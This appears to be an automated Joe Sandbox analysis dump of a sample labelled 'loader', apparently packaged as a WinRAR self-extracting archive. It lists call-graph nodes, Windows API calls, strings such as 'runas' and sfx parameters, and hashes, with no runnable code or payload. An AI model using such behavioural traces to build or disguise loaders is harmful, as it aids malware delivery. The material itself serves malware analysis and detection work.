42403 63a6fe 42399->42403 42401 63a6d0 42400->42401 42400->42403 42402 63a6e4 FindFirstFileW 42401->42402 42401->42403 42402->42403 42403->41998 42412 64a5e4 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 42404->42412 42406 64a5cd 42407 64a5d9 42406->42407 42413 64a605 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 42406->42413 42407->41713 42407->41714 42409->41722 42410->41722 42411->41725 42412->42406 42413->42407 42415 639f42 23 API calls 42414->42415 42416 631fe8 42415->42416 42417 632005 42416->42417 42418 631a04 25 API calls 42416->42418 42417->41740 42417->41741 42419 631ff5 42418->42419 42419->42417 42421 63138b 23 API calls 42419->42421 42421->42417 42423 64b583 GetMessageW 42422->42423 42424 64b5bc GetDlgItem 42422->42424 42425 64b5a8 TranslateMessage DispatchMessageW 42423->42425 42426 64b599 IsDialogMessageW 42423->42426 42424->41751 42424->41752 42425->42424 42426->42424 42426->42425 42448 6598f0 42456 65adaf 42448->42456 42451 659904 42454 659919 42457 65add6 __dosmaperr 42456->42457 42458 64fbbc CatchGuardHandler UnhandledExceptionFilter 42457->42458 42459 6598fa 42458->42459 42459->42451 42460 659869 42459->42460 42461 659874 42460->42461 42462 659888 42461->42462 42476 65ae5b UnhandledExceptionFilter CatchGuardHandler __dosmaperr 42461->42476 42463 65b136 __dosmaperr 2 API calls 42462->42463 42470 6598a8 42462->42470 42465 65989a 42463->42465 42466 6598a2 42465->42466 42477 65aeb1 UnhandledExceptionFilter CatchGuardHandler __dosmaperr 42465->42477 42468 658dcc _free 2 API calls 42466->42468 42468->42470 42469 6598b7 42469->42466 42471 6598be 42469->42471 42470->42454 42475 659920 UnhandledExceptionFilter 42470->42475 42478 659649 UnhandledExceptionFilter RtlFreeHeap __dosmaperr 42471->42478 42473 6598c9 42474 658dcc _free 2 API calls 42473->42474 42474->42470 42475->42451 42476->42462 42477->42469 42478->42473 42479 65bb30 42480 65bb39 42479->42480 42481 65bb42 42479->42481 42483 65ba27 42480->42483 42484 6597e5 _unexpected 5 API calls 42483->42484 
42485 65ba34 42484->42485 42503 65bb4e 42485->42503 42487 65ba3c 42510 65b7bb 42487->42510 42490 65ba53 42490->42481 42493 65ba96 42495 658dcc _free 2 API calls 42493->42495 42495->42490 42497 65ba91 42526 6591a8 UnhandledExceptionFilter RtlFreeHeap __dosmaperr 42497->42526 42499 65bada 42499->42493 42527 65b691 UnhandledExceptionFilter RtlFreeHeap UnhandledExceptionFilter 42499->42527 42500 65baae 42500->42499 42501 658dcc _free 2 API calls 42500->42501 42501->42499 42504 65bb5a ___scrt_is_nonwritable_in_current_image 42503->42504 42505 6597e5 _unexpected 5 API calls 42504->42505 42506 65bb64 __cftof _abort 42505->42506 42507 65bbe8 _abort 42506->42507 42509 658dcc _free 2 API calls 42506->42509 42528 658d24 5 API calls _abort 42506->42528 42507->42487 42509->42506 42511 654636 __cftof 5 API calls 42510->42511 42512 65b7cd 42511->42512 42512->42490 42513 658e06 42512->42513 42514 658e44 42513->42514 42515 658e14 __dosmaperr 42513->42515 42530 6591a8 UnhandledExceptionFilter RtlFreeHeap __dosmaperr 42514->42530 42515->42514 42517 658e42 42515->42517 42529 657a5e UnhandledExceptionFilter CatchGuardHandler __dosmaperr 42515->42529 42517->42493 42519 65bbf0 42517->42519 42520 65b7bb 5 API calls 42519->42520 42525 65bc0f _abort 42520->42525 42521 64fbbc CatchGuardHandler UnhandledExceptionFilter 42522 65ba89 42521->42522 42522->42497 42522->42500 42523 65bc16 42523->42521 42525->42523 42531 65b893 42525->42531 42526->42493 42527->42493 42529->42515 42530->42517 42533 65b8be 42531->42533 42540 65b977 42533->42540 42541 65c988 42533->42541 42535 64fbbc CatchGuardHandler UnhandledExceptionFilter 42537 65ba23 42535->42537 42537->42523 42539 65ab78 __vswprintf_c_l 5 API calls 42539->42540 42540->42535 42542 654636 __cftof 5 API calls 42541->42542 42543 65c9a8 42542->42543 42544 65ca7e 42543->42544 42546 658e06 __vswprintf_c_l 2 API calls 42543->42546 42549 65ca07 _abort __vsnwprintf_l 42543->42549 42545 64fbbc CatchGuardHandler UnhandledExceptionFilter 42544->42545 42547 
65b92e 42545->42547 42546->42549 42550 65ab78 42547->42550 42555 65abc3 UnhandledExceptionFilter RtlFreeHeap _free 42549->42555 42551 654636 __cftof 5 API calls 42550->42551 42552 65ab8b 42551->42552 42556 65a95b 42552->42556 42555->42544 42557 65a976 __vswprintf_c_l 42556->42557 42559 65a9e7 __vsnwprintf_l 42557->42559 42561 658e06 __vswprintf_c_l 2 API calls 42557->42561 42563 65ab50 42557->42563 42558 64fbbc CatchGuardHandler UnhandledExceptionFilter 42560 65ab63 42558->42560 42574 65aa9c 42559->42574 42578 65af6c 42559->42578 42560->42539 42561->42559 42563->42558 42566 65aa73 42568 65af6c __vswprintf_c_l UnhandledExceptionFilter 42566->42568 42566->42574 42567 65aaab 42570 658e06 __vswprintf_c_l 2 API calls 42567->42570 42573 65aacc __vsnwprintf_l 42567->42573 42568->42574 42569 65ab41 42584 65abc3 UnhandledExceptionFilter RtlFreeHeap _free 42569->42584 42570->42573 42571 65af6c __vswprintf_c_l UnhandledExceptionFilter 42575 65ab20 42571->42575 42573->42569 42573->42571 42585 65abc3 UnhandledExceptionFilter RtlFreeHeap _free 42574->42585 42575->42569 42576 65ab6f 42575->42576 42586 65abc3 UnhandledExceptionFilter RtlFreeHeap _free 42576->42586 42579 65af93 __dosmaperr 42578->42579 42581 65af9c 42579->42581 42587 65aff4 UnhandledExceptionFilter CatchGuardHandler __dosmaperr __vswprintf_c_l 42579->42587 42582 64fbbc CatchGuardHandler UnhandledExceptionFilter 42581->42582 42583 65aa60 42582->42583 42583->42566 42583->42567 42583->42574 42584->42574 42585->42563 42586->42574 42587->42581 42588 65abf0 42589 65abfb 42588->42589 42591 65ac20 42589->42591 42592 65af0a 42589->42592 42593 65af31 __dosmaperr 42592->42593 42594 64fbbc CatchGuardHandler UnhandledExceptionFilter 42593->42594 42595 65af66 42594->42595 42595->42589 42427 64dec2 42428 64decf 42427->42428 42429 63e617 7 API calls 42428->42429 42430 64dedc 42429->42430 42431 634092 _swprintf 5 API calls 42430->42431 42432 64def1 SetDlgItemTextW 42431->42432 42433 64b568 5 API calls 42432->42433 42434 64df0e 
42433->42434 42596 64f3b2 42597 64f3be ___scrt_is_nonwritable_in_current_image 42596->42597 42624 64eed7 42597->42624 42599 64f3c5 42600 64f518 42599->42600 42603 64f3ef 42599->42603 42676 64f838 UnhandledExceptionFilter _abort 42600->42676 42602 64f51f 42670 657f58 42602->42670 42612 64f42e ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 42603->42612 42628 658aed 42603->42628 42613 64f48f 42612->42613 42673 657af4 5 API calls 3 library calls 42612->42673 42636 658a3e UnhandledExceptionFilter GetPEB RtlFreeHeap UnhandledExceptionFilter RtlExitUserProcess 42613->42636 42615 64f49d 42637 64df1e 42615->42637 42618 64f4aa 42618->42602 42619 64f4b5 42618->42619 42620 64f4be 42619->42620 42674 657efb UnhandledExceptionFilter GetPEB RtlFreeHeap RtlExitUserProcess _abort 42619->42674 42675 64f048 UnhandledExceptionFilter ___scrt_uninitialize_crt 42620->42675 42623 64f40e 42625 64eee0 42624->42625 42627 64eef5 ___scrt_uninitialize_crt 42625->42627 42678 658977 42625->42678 42627->42599 42629 658b04 42628->42629 42630 64fbbc CatchGuardHandler UnhandledExceptionFilter 42629->42630 42631 64f408 42630->42631 42631->42623 42632 658a91 42631->42632 42633 658ac0 42632->42633 42634 64fbbc CatchGuardHandler UnhandledExceptionFilter 42633->42634 42635 658ae9 42634->42635 42635->42612 42636->42615 42685 640863 42637->42685 42639 64df2e 42700 64ac16 42639->42700 42641 64df46 _abort 42648 64dfbc 42641->42648 42705 64c5c4 42641->42705 42644 64dfe0 42710 64dbde 42644->42710 42646 634092 _swprintf 5 API calls 42647 64e04d LoadIconW 42646->42647 42714 64b6dd LoadBitmapW 42647->42714 42648->42646 42649 64df76 __InternalCxxFrameHandler 42649->42648 42650 64dbde SetEnvironmentVariableW 42649->42650 42650->42648 42655 64e098 42736 6490b7 42655->42736 42658 6490b7 UnhandledExceptionFilter 42659 64e0aa DialogBoxParamW 42658->42659 42660 64e0e4 42659->42660 42662 64e10b 42660->42662 42742 64ae2f SetCurrentDirectoryW _abort _wcslen 42660->42742 42663 64e12a DeleteObject 
42662->42663 42664 64e146 42663->42664 42665 64e13f DeleteObject 42663->42665 42666 64e17d 42664->42666 42743 64dc3b PeekMessageW GetMessageW TranslateMessage DispatchMessageW 42664->42743 42665->42664 42739 64ac7c 42666->42739 42669 64e1c3 42669->42618 42834 657cd5 42670->42834 42673->42613 42674->42620 42675->42623 42676->42602 42681 65c05a 42678->42681 42684 65c073 42681->42684 42682 64fbbc CatchGuardHandler UnhandledExceptionFilter 42683 658986 42682->42683 42683->42627 42684->42682 42687 64086d 42685->42687 42688 640b54 42687->42688 42744 6575fb 5 API calls 2 library calls 42687->42744 42689 640c94 GetFileAttributesW 42688->42689 42690 640cac 42688->42690 42689->42688 42689->42690 42691 640d73 42690->42691 42693 640d0d 42690->42693 42699 640d5e _wcslen 42690->42699 42692 634092 _swprintf 5 API calls 42691->42692 42692->42699 42694 63e617 7 API calls 42693->42694 42695 640d3c 42694->42695 42696 634092 _swprintf 5 API calls 42695->42696 42697 640d4f 42696->42697 42698 63e617 7 API calls 42697->42698 42698->42699 42699->42639 42745 64081b 42700->42745 42702 64ac2a OleInitialize 42703 64ac4d 42702->42703 42704 64ac6b SHGetMalloc 42703->42704 42704->42641 42709 64c5ce 42705->42709 42706 64c6e4 42706->42644 42706->42649 42707 641fac CharUpperW 42707->42709 42709->42706 42709->42707 42747 63f3fa 23 API calls 2 library calls 42709->42747 42712 64dbeb 42710->42712 42711 64dc36 42711->42648 42712->42711 42713 64dc2a SetEnvironmentVariableW 42712->42713 42713->42711 42715 64b6fe 42714->42715 42716 64b70b GetObjectW 42714->42716 42748 64a6c2 42715->42748 42720 64b71a 42716->42720 42718 64b705 42718->42716 42718->42720 42719 64a5c6 4 API calls 42721 64b72d 42719->42721 42720->42719 42722 64b770 42721->42722 42723 64b74c 42721->42723 42724 64a6c2 2 API calls 42721->42724 42733 63da42 42722->42733 42754 64a605 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 42723->42754 42726 64b73d 42724->42726 42726->42723 42728 64b743 DeleteObject 42726->42728 42727 64b754 42755 64a5e4 GetDC 
GetDeviceCaps GetDeviceCaps ReleaseDC 42727->42755 42728->42723 42730 64b75d 42756 64a80c 8 API calls 42730->42756 42732 64b764 DeleteObject 42732->42722 42759 63da67 42733->42759 42735 63da4e 42735->42655 42737 64eb38 UnhandledExceptionFilter 42736->42737 42738 6490d6 42737->42738 42738->42658 42740 64acab 42739->42740 42741 64acb5 CoUninitialize 42740->42741 42741->42669 42742->42662 42743->42666 42744->42688 42746 640828 42745->42746 42746->42702 42747->42709 42749 64a6db __InternalCxxFrameHandler 42748->42749 42750 64a754 CreateStreamOnHGlobal 42749->42750 42753 64a776 42749->42753 42751 64a76c 42750->42751 42750->42753 42757 64a626 739A6BB0 42751->42757 42753->42718 42754->42727 42755->42730 42756->42732 42758 64a638 42757->42758 42758->42753 42760 63da75 _wcschr __EH_prolog 42759->42760 42797 6398e0 42760->42797 42762 63959a 25 API calls 42764 63e24d 42762->42764 42763 63db31 42801 656310 42763->42801 42764->42735 42766 63db05 42766->42763 42768 63e261 23 API calls 42766->42768 42778 63dd4a 42766->42778 42767 63db44 42769 656310 3 API calls 42767->42769 42768->42766 42777 63db56 ___vcrt_FlsSetValue 42769->42777 42770 63dc85 42770->42778 42821 639d70 25 API calls 42770->42821 42772 639e80 24 API calls 42772->42777 42774 63dc9f ___std_exception_copy 42775 639bd0 25 API calls 42774->42775 42774->42778 42794 63dcc8 ___vcrt_FlsSetValue _wcslen ___std_exception_copy 42775->42794 42777->42770 42777->42772 42777->42778 42815 639bd0 42777->42815 42820 639d70 25 API calls 42777->42820 42778->42762 42779 63e159 42784 63e1de 42779->42784 42827 658cce UnhandledExceptionFilter RtlFreeHeap UnhandledExceptionFilter ___std_exception_copy 42779->42827 42781 63e16e 42828 657625 UnhandledExceptionFilter RtlFreeHeap UnhandledExceptionFilter ___std_exception_copy 42781->42828 42783 63e214 42788 656310 3 API calls 42783->42788 42784->42783 42790 63e261 23 API calls 42784->42790 42786 63e1c6 42829 63e27c 23 API calls 42786->42829 42789 63e22d 42788->42789 42791 656310 3 API calls 
42789->42791 42790->42784 42791->42778 42794->42778 42794->42779 42822 63e5b1 5 API calls __vsnprintf 42794->42822 42823 656159 3 API calls 3 library calls 42794->42823 42824 658cce UnhandledExceptionFilter RtlFreeHeap UnhandledExceptionFilter ___std_exception_copy 42794->42824 42825 657625 UnhandledExceptionFilter RtlFreeHeap UnhandledExceptionFilter ___std_exception_copy 42794->42825 42826 63e27c 23 API calls 42794->42826 42798 6398ea 42797->42798 42799 63994b CreateFileW 42798->42799 42800 63996c 42799->42800 42800->42766 42802 656349 42801->42802 42803 65634d 42802->42803 42805 656375 42802->42805 42830 6591a8 UnhandledExceptionFilter RtlFreeHeap __dosmaperr 42803->42830 42807 656699 42805->42807 42832 656230 UnhandledExceptionFilter CatchGuardHandler 42805->42832 42806 656352 42831 659087 UnhandledExceptionFilter RtlFreeHeap UnhandledExceptionFilter ___std_exception_copy 42806->42831 42809 64fbbc CatchGuardHandler UnhandledExceptionFilter 42807->42809 42811 6566a6 42809->42811 42810 65635d 42812 64fbbc CatchGuardHandler UnhandledExceptionFilter 42810->42812 42811->42767 42814 656369 42812->42814 42814->42767 42816 639bdc 42815->42816 42818 639be3 42815->42818 42816->42777 42818->42816 42819 639785 ReadFile GetFileType 42818->42819 42833 636d1a 23 API calls 42818->42833 42819->42818 42820->42777 42821->42774 42822->42794 42823->42794 42824->42794 42825->42794 42826->42794 42827->42781 42828->42786 42829->42784 42830->42806 42831->42810 42832->42805 42833->42818 42835 657ce1 _abort _unexpected 42834->42835 42839 657cf9 _abort 42835->42839 42859 657e73 42835->42859 42836 657d9f _abort 42840 657dbc 42836->42840 42841 657de8 42836->42841 42838 657d76 42842 657d8e 42838->42842 42846 658a91 _abort UnhandledExceptionFilter 42838->42846 42839->42836 42839->42838 42863 6587e0 UnhandledExceptionFilter RtlFreeHeap _abort 42839->42863 42850 657dee 42840->42850 42864 662390 UnhandledExceptionFilter CatchGuardHandler 42841->42864 42847 658a91 _abort UnhandledExceptionFilter 
42842->42847 42846->42842 42847->42836 42865 65b076 42850->42865 42853 657e0c 42855 657e73 _abort UnhandledExceptionFilter 42853->42855 42854 657dfc GetPEB 42854->42853 42856 657e24 42855->42856 42869 4ff66f2 RtlExitUserProcess 42856->42869 42862 657e99 42859->42862 42860 64fbbc CatchGuardHandler UnhandledExceptionFilter 42861 657ed9 42860->42861 42861->42839 42862->42860 42863->42838 42866 65b091 __dosmaperr 42865->42866 42867 64fbbc CatchGuardHandler UnhandledExceptionFilter 42866->42867 42868 657df8 42867->42868 42868->42853 42868->42854 42870 657e2e 42869->42870 42871 65bfb3 42872 65bfbe 42871->42872 42873 65bfe6 42872->42873 42874 65bfd7 42872->42874 42875 65bff5 42873->42875 42892 65f20f UnhandledExceptionFilter RtlFreeHeap UnhandledExceptionFilter __dosmaperr ___std_exception_copy 42873->42892 42891 6591a8 UnhandledExceptionFilter RtlFreeHeap __dosmaperr 42874->42891 42880 658e54 42875->42880 42878 65bfdc _abort 42881 658e61 42880->42881 42882 658e6c 42880->42882 42883 658e06 __vswprintf_c_l 2 API calls 42881->42883 42884 658e74 42882->42884 42888 658e7d __dosmaperr 42882->42888 42889 658e69 42883->42889 42885 658dcc _free 2 API calls 42884->42885 42885->42889 42886 658e82 42893 6591a8 UnhandledExceptionFilter RtlFreeHeap __dosmaperr 42886->42893 42888->42886 42888->42889 42894 657a5e UnhandledExceptionFilter CatchGuardHandler __dosmaperr 42888->42894 42889->42878 42891->42878 42892->42875 42893->42889 42894->42888 42895 639a74 42898 639a7e 42895->42898 42896 639b9d SetFilePointer 42897 639ab1 42896->42897 42898->42896 42898->42897 42899 63981a 24 API calls 42898->42899 42900 639b79 42898->42900 42899->42900 42900->42896 42901 639f7a 42902 639f88 42901->42902 42904 639f8f 42901->42904 42903 63a003 WriteFile 42903->42904 42904->42902 42904->42903 42906 63a095 42904->42906 42908 636baa 23 API calls 42904->42908 42909 636e98 23 API calls 42906->42909 42908->42904 42909->42902 42910 82d598 42911 82d5a5 VirtualAlloc 42910->42911 42913 64cd58 42916 64cd7b _wcschr 
42913->42916 42915 64d40a 42922 64c793 _abort _wcslen _wcsrchr 42916->42922 42925 64d78f 42916->42925 42917 64ca67 SetWindowTextW 42917->42922 42920 64cc31 GetDlgItem SetWindowTextW SendMessageW 42920->42922 42922->42915 42922->42917 42922->42920 42923 64cc71 SendMessageW 42922->42923 42924 634092 _swprintf 5 API calls 42922->42924 42937 63b991 5 API calls 3 library calls 42922->42937 42938 63a5d1 FindFirstFileW FindFirstFileW 42922->42938 42939 64b48e 23 API calls 2 library calls 42922->42939 42923->42922 42924->42922 42927 64d799 _abort _wcslen 42925->42927 42926 64d9e7 42926->42922 42927->42926 42928 63a231 2 API calls 42927->42928 42933 64d93d 42927->42933 42929 64d8ba 42928->42929 42931 64d8d9 ShellExecuteExW 42929->42931 42930 64d9de ShowWindow 42930->42926 42931->42926 42934 64d8ec 42931->42934 42932 64d925 42940 64dc3b PeekMessageW GetMessageW TranslateMessage DispatchMessageW 42932->42940 42933->42926 42933->42930 42934->42932 42934->42933 42936 64d91b ShowWindow 42934->42936 42936->42932 42937->42922 42938->42922 42939->42922 42940->42933
APIs
• __EH_prolog.LIBCMT ref: 0064B7E5
  • Part of subcall function 00631316: GetDlgItem.USER32(00000000,00003021), ref: 0063135A
  • Part of subcall function 00631316: SetWindowTextW.USER32(00000000,006635F4), ref: 00631370
• SetDlgItemTextW.USER32(?,00000001,00000000), ref: 0064B8D1
• GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0064B8EF
• IsDialogMessageW.USER32(?,?), ref: 0064B902
• TranslateMessage.USER32(?), ref: 0064B910
• DispatchMessageW.USER32(?), ref: 0064B91A
• GetDlgItemTextW.USER32(?,00000066,?,00000800), ref: 0064B93D
• EndDialog.USER32(?,00000001), ref: 0064B960
• GetDlgItem.USER32(?,00000068), ref: 0064B983
• SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 0064B99E
• SendMessageW.USER32(00000000,000000C2,00000000,006635F4), ref: 0064B9B1
  • Part of subcall function 0064D453: _wcschr.LIBVCRUNTIME ref: 0064D45C
  • Part of subcall function 0064D453: _wcslen.LIBCMT ref: 0064D47D
• SetFocus.USER32(00000000), ref: 0064B9B8
• _swprintf.LIBCMT ref: 0064BA24
  • Part of subcall function 00634092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 006340A5
  • Part of subcall function 0064D4D4: GetDlgItem.USER32(00000068,0068FCB8), ref: 0064D4E8
  • Part of subcall function 0064D4D4: ShowWindow.USER32(00000000,00000005,?,?,?,0064AF07,00000001,?,?,0064B7B9,0066506C,0068FCB8,0068FCB8,00001000,00000000,00000000), ref: 0064D510
                                                                                      • Part of subcall function 0064D4D4: SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 0064D51B
                                                                                      • Part of subcall function 0064D4D4: SendMessageW.USER32(00000000,000000C2,00000000,006635F4), ref: 0064D529
                                                                                      • Part of subcall function 0064D4D4: SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 0064D53F
                                                                                      • Part of subcall function 0064D4D4: SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 0064D559
                                                                                      • Part of subcall function 0064D4D4: SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 0064D59D
                                                                                      • Part of subcall function 0064D4D4: SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 0064D5AB
                                                                                      • Part of subcall function 0064D4D4: SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 0064D5BA
                                                                                      • Part of subcall function 0064D4D4: SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 0064D5E1
                                                                                      • Part of subcall function 0064D4D4: SendMessageW.USER32(00000000,000000C2,00000000,006643F4), ref: 0064D5F0
                                                                                    • _swprintf.LIBCMT ref: 0064BAC2
                                                                                    • _swprintf.LIBCMT ref: 0064BB7C
                                                                                    • ShellExecuteExW.SHELL32(0000003C), ref: 0064BC6F
                                                                                    • _swprintf.LIBCMT ref: 0064BD1E
                                                                                    • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 0064BD7D
                                                                                    • SetDlgItemTextW.USER32(?,00000065,006635F4), ref: 0064BD94
                                                                                    • GetDlgItem.USER32(?,00000065), ref: 0064BD9D
                                                                                    • GetWindowLongW.USER32(00000000,000000F0), ref: 0064BDAC
                                                                                    • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 0064BDBB
                                                                                    • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 0064BE68
                                                                                    • _wcslen.LIBCMT ref: 0064BEBE
                                                                                    • _swprintf.LIBCMT ref: 0064BEE8
                                                                                    • SendMessageW.USER32(?,00000080,00000001,?), ref: 0064BF32
                                                                                    • SendDlgItemMessageW.USER32(?,0000006C,00000172,00000000,?), ref: 0064BF4C
                                                                                    • GetDlgItem.USER32(?,00000068), ref: 0064BF55
                                                                                    • SendMessageW.USER32(00000000,00000435,00000000,00400000), ref: 0064BF6B
                                                                                    • GetDlgItem.USER32(?,00000066), ref: 0064BF85
                                                                                    • SetWindowTextW.USER32(00000000,0067A472), ref: 0064BFA7
                                                                                    • SetDlgItemTextW.USER32(?,0000006B,00000000), ref: 0064C007
                                                                                    • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 0064C01A
                                                                                    • DialogBoxParamW.USER32(LICENSEDLG,00000000,Function_0001B5C0,00000000,?), ref: 0064C0BD
                                                                                    • EnableWindow.USER32(00000000,00000000), ref: 0064C197
                                                                                    • SendMessageW.USER32(?,00000111,00000001,00000000), ref: 0064C1D9
                                                                                      • Part of subcall function 0064C73F: __EH_prolog.LIBCMT ref: 0064C744
                                                                                    • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 0064C1FD
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2187129898.0000000000631000.00000040.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_630000_loader.jbxd
                                                                                    Similarity
                                                                                    • API ID: Message$ItemSend$Text$Window$_swprintf$Dialog$H_prologLong_wcslen$DispatchEnableExecuteFocusParamShellShowTranslate__vswprintf_c_l_wcschr
                                                                                    • String ID: %s$"%s"%s$-el -s2 "-d%s" "-sp%s"$<$@$C:\Users\user\Desktop$LICENSEDLG$STARTDLG$^d$__tmp_rar_sfx_access_check_%u$hd$runas$winrarsfxmappingfile.tmp
                                                                                    • API String ID: 1533452614-3391552232
                                                                                    • Opcode ID: f2fc490754ed8c89fcc155256acbed226d2de369a1483853a9c6ede7f541071b
                                                                                    • Instruction ID: c371fe0d0150c219d5b28f2149dd0e236019ec4b22c36f98edac1649acf2c118
                                                                                    • Opcode Fuzzy Hash: f2fc490754ed8c89fcc155256acbed226d2de369a1483853a9c6ede7f541071b
                                                                                    • Instruction Fuzzy Hash: E8421870944254BEEB619FB0DC4AFFE77AF9B02700F001159F544A62E2CBB59E84CB65

                                                                                    Control-flow Graph

                                                                                    APIs
                                                                                      • Part of subcall function 0064AC16: OleInitialize.OLE32(00000000), ref: 0064AC2F
                                                                                      • Part of subcall function 0064AC16: SHGetMalloc.SHELL32(00678438), ref: 0064AC70
                                                                                    • _swprintf.LIBCMT ref: 0064E048
                                                                                    • LoadIconW.USER32(00000000,00000064), ref: 0064E078
                                                                                    • DialogBoxParamW.USER32(00000000,STARTDLG,00000000,Function_0001B7E0,00000000), ref: 0064E0C9
                                                                                    • DeleteObject.GDI32 ref: 0064E130
                                                                                    • DeleteObject.GDI32(?), ref: 0064E140
                                                                                      • Part of subcall function 0064DBDE: SetEnvironmentVariableW.KERNELBASE(sfxpar,00000000), ref: 0064DC30
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2187129898.0000000000631000.00000040.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_630000_loader.jbxd
                                                                                    Similarity
                                                                                    • API ID: DeleteObject$DialogEnvironmentIconInitializeLoadMallocParamVariable_swprintf
                                                                                    • String ID: %4d-%02d-%02d-%02d-%02d-%02d-%03d$C:\Users\user\Desktop$STARTDLG$sfxname$sfxstime$winrarsfxmappingfile.tmp$xzh
                                                                                    • API String ID: 730176925-652597700
                                                                                    • Opcode ID: 0628efebc2b170d27effabed8daf915e9e13c056ce916fbfb526edccabf70e97
                                                                                    • Instruction ID: c776596a0fc7858666e94364a6be4fd9d85d6bf55b4340f2847ccb0484de85d5
                                                                                    • Opcode Fuzzy Hash: 0628efebc2b170d27effabed8daf915e9e13c056ce916fbfb526edccabf70e97
                                                                                    • Instruction Fuzzy Hash: A9610F71944211BFD360AFB4EC4AE6B7BEFAB45700F00142EF949933A1DAB48948C761

                                                                                    Control-flow Graph

                                                                                    APIs
                                                                                    • FindFirstFileW.KERNELBASE(?,?,?,?,00000000,?,0063A592,000000FF,?,?), ref: 0063A6C4
                                                                                      • Part of subcall function 0063BB03: _wcslen.LIBCMT ref: 0063BB27
                                                                                    • FindFirstFileW.KERNELBASE(?,?,?,?,00000800,?,0063A592,000000FF,?,?), ref: 0063A6F2
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2187129898.0000000000631000.00000040.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_630000_loader.jbxd
                                                                                    Similarity
                                                                                    • API ID: FileFindFirst$_wcslen
                                                                                    • String ID:
                                                                                    • API String ID: 1818217402-0
                                                                                    • Opcode ID: b1a186b669cf6a7c2cc8fdc42cbf1052152693489eaea1d8b9e877970e36fbb9
                                                                                    • Instruction ID: 9f20b4ba76b2fabe0bceef8b15419b4c51466497608a43eafd3d53b639577675
                                                                                    • Opcode Fuzzy Hash: b1a186b669cf6a7c2cc8fdc42cbf1052152693489eaea1d8b9e877970e36fbb9
                                                                                    • Instruction Fuzzy Hash: 3D419176900115ABCB25DFA4CCC4AE9B7BAFB49350F10419AF59EE3200D7346E94DF90
                                                                                    APIs
                                                                                    • NtQueryInformationProcess.NTDLL(?,00000000,?,00000018,00000000), ref: 04FF686D
                                                                                    • GetSystemInfo.KERNELBASE(?), ref: 04FF687F
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2189140272.0000000004FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04FF0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_4ff0000_loader.jbxd
                                                                                    Similarity
                                                                                    • API ID: InfoInformationProcessQuerySystem
                                                                                    • String ID:
                                                                                    • API String ID: 1993426926-0
                                                                                    • Opcode ID: 9fe47f2950c11057c91d520df20ea6c509abfe2eb78b1b7c4841bad8b7fbf8e3
                                                                                    • Instruction ID: 580937e649af39ad689b1c7a5ef248586fc28e1d79da6fe15f5d81b16cbfd03e
                                                                                    • Opcode Fuzzy Hash: 9fe47f2950c11057c91d520df20ea6c509abfe2eb78b1b7c4841bad8b7fbf8e3
                                                                                    • Instruction Fuzzy Hash: CCF0F876600219AFCB099F9ADC49EDE7BA8EB09790B018019FD16E7250C7319900CBA0
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2187129898.0000000000631000.00000040.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_630000_loader.jbxd
                                                                                    Similarity
                                                                                    • API ID: H_prolog
                                                                                    • String ID:
                                                                                    • API String ID: 3519838083-0
                                                                                    • Opcode ID: e086538854fcffef3314065d7d7e3043922c2252124d95c81032273873749af6
                                                                                    • Instruction ID: 371930520d9655b5f565653635723f6254cbba7ae99211f1ed857b60bc6aa357
                                                                                    • Opcode Fuzzy Hash: e086538854fcffef3314065d7d7e3043922c2252124d95c81032273873749af6
                                                                                    • Instruction Fuzzy Hash: 9782C771904345AEDF15DF64C891BFABBBBAF15300F0841B9F8499B242DB715A89CBE0
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2187129898.0000000000631000.00000040.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_630000_loader.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 7ca25c04729dd8d9882d3feb0495ca5edf9aa1ea9072dc016ae190078155826b
                                                                                    • Instruction ID: 0b0caa5aaf87098a6f0b1ed688663a7f3ac07909dff6ce204fa9b3ae2b0ff0d0
                                                                                    • Opcode Fuzzy Hash: 7ca25c04729dd8d9882d3feb0495ca5edf9aa1ea9072dc016ae190078155826b
                                                                                    • Instruction Fuzzy Hash: 24E04F31000248ABCF01AF10ED0A9897F6BEB00342F005458FC059A232CB75DE59CA94

                                                                                    Control-flow Graph

                                                                                    APIs
